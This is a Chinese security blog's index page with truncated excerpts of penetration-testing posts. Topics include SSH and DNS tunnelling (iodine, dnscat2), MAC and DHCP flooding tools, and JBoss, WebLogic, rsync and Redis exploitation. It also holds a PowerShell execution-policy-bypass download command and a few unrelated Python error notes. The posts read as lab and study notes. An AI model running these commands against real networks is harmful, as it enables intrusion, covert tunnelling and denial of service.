weixin_44110913的博客

文章目录windows远程下载windows远程下载powershell -exec bypass -c (new-object System.Net.WebClient).downloadfile(' 下载文件路径 ','C:\本地生成文件的名字.exe')

文章目录ssh隧道原理ssh本地端口转发原理ssh远程端口转发原理ssh动态端口转发原理ssh隧道原理ssh本地端口转发原理本地ssh端口转发通常是边界服务器有外网网卡和内网网卡，则数据就是像图中顺时针走，这就叫本地ssh端口转发。使用场景：我们想从vps访问图中数据库服务器，但无法直接访问，所以需要使用web做为跳板，搭建ssh隧道ssh远程端口转发原理ssh远程端口转发：通常边界服务器没有外网网卡，所以，我们（vps）找不到它，让它来找我们，这也就是远程端口转发使用场景：我们

iodine可以通过一台dns服务器制造一个IPv4数据通道，特别适合在目标主机只能发送dns请求的网络中环境中使用。iodine是基于C语言开发的，分为服务端程序iodined和客户端程序iodine。iodine支持EDNS、base32，base64，base128等多种编码规范。　　　　GitHub：https://github.com/boazsegev/iodine　　　　iodine支持直接转发和中继两种模式，其原理是通过TAP虚拟网卡，在服务端建立一个局域网；在客户端，通过TAP建立

域名购买网站：https://dcc.godaddy.com/ 购买域名，并且注册网站，应用该模块安装服务端：apt-get install gemapt-get install ruby-devapt-get install libpq-devcd dnscat2/servergit clone https://github.com/iagox86/dnscat2.git编译bundle install中继模式启动服务端sudo ruby ./dnscat2.rb vpn.xxx -e

MAC地址泛洪原理攻击工具:macof使用方法：macof -i eth0(端口) -n 10(发送次数)配置路由ip DHCP pool XXXnetwork 默认网关 子网掩码(例如:192.168.1.0 255.255.255.0)default-router 192.168.1.254int e0/0ip address 192.168.1.254 255.255.255.0no shut在pc查看是否配好：ip dhcp攻击工具:yersinia -G 直接在里面选择网卡

文章目录通过询问被攻击的时间通过攻击语句通过常用工具的指纹通过寻找频繁的访问通过询问被攻击的时间问管理员何时发生的异常，通过时间去寻找日志，快速发现当天访问情况通过攻击语句攻击者通常会使用攻击语句，可以直接搜索攻击语句即可如：select scirpt …/…/…/ 等通过常用工具的指纹攻击者可能会使用工具但是很多都有指纹，可以直接搜索指纹如：nmapsqlmapnessus通过寻找频繁的访问通过寻找平凡访问的连接，如：直接查看连接：post后台名字：xxxx/

文章目录 Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504 基础知识漏洞原理影响版本复现思路复现—CVE-2017-121491、特征检测2、反弹shell 复现—CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流，便于

文章目录CVE-2017-10271CVE-2018-2628CVE-2018-2894CVE-2020-14882SSRF漏洞配合RedisWeblogic文件读取CVE-2017-10271Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。参考链接：https://www.exploit-db.com/exploits/43458/https://pape

1.基础知识1.DNSDNS(Domain Name System，域名系统)，因特网上作为域名和IP地址相互映射的一个分布式数据库，能够使用户更方便的访问互联网，而不用去记住能够被机器直接读取的IP数串。通过主机名，最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上，使用端口号53。在RFC文档中RFC 2181对DNS有规范说明，RFC 2136对DNS的动态更新进行说明，RFC 2308对DNS查询的反向缓存进行说明。2.DnslogDn...

文章目录 一、漏洞介绍二、漏洞环境三、漏洞利用3.1 漏洞探测3.2 漏洞利用（下载任意文件）3.3 漏洞利用（提权、反弹shell）3.3.1 方法一3.3.2 方法二 四、修复建议 一、漏洞介绍   rsync是Linux下一个远程同步工具，可快速同步多台主机中的文件和目录，如果配置不当，导致任何...

采用的虚拟机环境为ubuntu16.04，在虚拟机上搭建好docker环境。采用的vulhub来进行复现。 使用git来下载，命令为git clone https://github.com/vulhub/vulhub.git 进入ssrf漏洞中， cd /vulh...

0.先提几个概念JRMP:java remote method protocol，Java远程方法协议JRMP是的Java技术协议的具体对象为希望和远程引用。JRMP只能是一个Java特有的,基于流的协议。相对于的RMI - IIOP的 ，该协议JRMP只能是一个对象的Java到Java的远程调用，这使得它依赖语言，意思是客户端和服务器必须使用Java。JRMP:Java远程消息交换协议JRMP（Java Remote Messaging Protocol）该协议基于TCP/IP，既然是作为信息交换

        Scapy（不是Scrapy）是Python中一个强大的数据包处理程序，它能够伪造或者解码大量的网络协议数据包，能够发送、捕捉、匹配请求和回复包等等。它可以很容易地处理一些典型操作，比如端口扫描，tracerouting，探测，单元 测试，攻击或网络发现（可替代hping，NMAP，arpspoof，ARP-SK，arping，tcpdump，tethereal，P0F等）。 最重要的他还有很多更优秀的特性——发送无效..

pip show pip 出现以下问题WARNING: pip is being invoked by an old script wrapper. This will fail in a future version of pip. Please seehttps://github.com/pypa/pip/issues/5599 for advice on fixing theunderlying issue. To avoid this problem you can invoke Pytho

JBOSS 下载地址：http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zipEXP 下载地址：https://github.com/yunxu1/jboss-_CVE-2017-121492). 环境搭建wget http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip第二步：修改配置文件，使网络中的主机都

一、Json简介 JSON 是存储和交换文本信息的语法，是轻量级的文本数据交换格式。类似xml，但JSON 比 XML 更小、更快，更易解析。所以现在接口数据传输都采用json方式进行。JSON 文本的 MIME 类型是 "application/json"。 json语法 数据在名称/值对中数据由逗号分隔大括号保存对象中括号保存数组JSON 值 JSON 值可以是： 数字（整数或浮点数）  {"age":30 }字符串（在双引号中）...

Redis是什么？ Redis是数据库，一个高性能的key-value存储系统，是使用ANSI C语言编写的。 Redis未授权访问漏洞 Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有...

前言 本节学习NTP放大攻击 1、简介 Network Time Protocol 保证网络设备时间同步电子设备互相干扰导致时钟差异越来越大，影响应用正常运行、日志审计不可信服务端口UDP 123 攻击原理 NTP 服务提monlist (MON_GETLIST) 查询功能，监控NTP 服务器的状况客户端查询时，NTP服务...

报错代码： import syspath = r"..." #数据来源f = open(path)line = f.readline() while line:#提取数据 a = line.split( ) b = a[:] print(b) data.append(b) line = f.readline()f.close 报错信息：'utf-8' codec can't decode byte 0xbe in positio...